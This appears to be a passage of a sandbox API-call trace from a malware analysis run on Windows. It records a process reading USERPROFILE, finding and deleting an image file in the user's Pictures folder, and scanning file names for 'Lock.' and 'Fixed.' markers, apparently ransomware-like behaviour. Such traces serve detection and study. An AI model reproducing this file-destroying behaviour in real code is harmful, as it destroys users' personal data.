1 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.680] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0256.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Ur-fU4s.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ur-fU4s.jpg", lpFilePart=0x8bedfc*="Ur-fU4s.jpg") returned 0x32 [0256.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0256.682] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ur-fU4s.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ur-fu4s.jpg")) returned 0x20 [0256.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ur-fU4s.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a001f0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x464cd3a0, ftLastAccessTime.dwHighDateTime=0x1d4cd1e, ftLastWriteTime.dwLowDateTime=0x464cd3a0, ftLastWriteTime.dwHighDateTime=0x1d4cd1e, nFileSizeHigh=0x0, nFileSizeLow=0xe5f1, dwReserved0=0x16dd, dwReserved1=0x4, cFileName="Ur-fU4s.jpg", cAlternateFileName="")) returned 0xaa5820 [0256.682] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ur-fU4s.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ur-fu4s.jpg")) returned 1 [0256.684] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a001f0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x464cd3a0, ftLastAccessTime.dwHighDateTime=0x1d4cd1e, ftLastWriteTime.dwLowDateTime=0x464cd3a0, ftLastWriteTime.dwHighDateTime=0x1d4cd1e, nFileSizeHigh=0x0, nFileSizeLow=0xe5f1, dwReserved0=0x16dd, dwReserved1=0x4, cFileName="Ur-fU4s.jpg", cAlternateFileName="")) returned 0 [0256.684] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0256.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.685] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0256.685] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0256.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.686] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0256.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Ur-fU4s.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ur-fU4s.jpg", lpFilePart=0x8bf658*="Ur-fU4s.jpg") returned 0x32 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0256.688] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ur-fU4s.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ur-fu4s.jpg")) returned 0xffffffff [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.688] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0256.688] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.688] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLD3Nk1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LD3Nk1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3Nk1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Nk1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nk1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TIwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IwkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GNmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NmyGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="myGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yGPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GPC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PC.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0256.690] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2e) returned 0x24b3538 [0256.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VLD3Nk1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LD3Nk1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3Nk1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Nk1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nk1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TIwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IwkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wkGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GNmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NmyGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="myGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yGPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GPC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PC.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b39d0 [0256.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 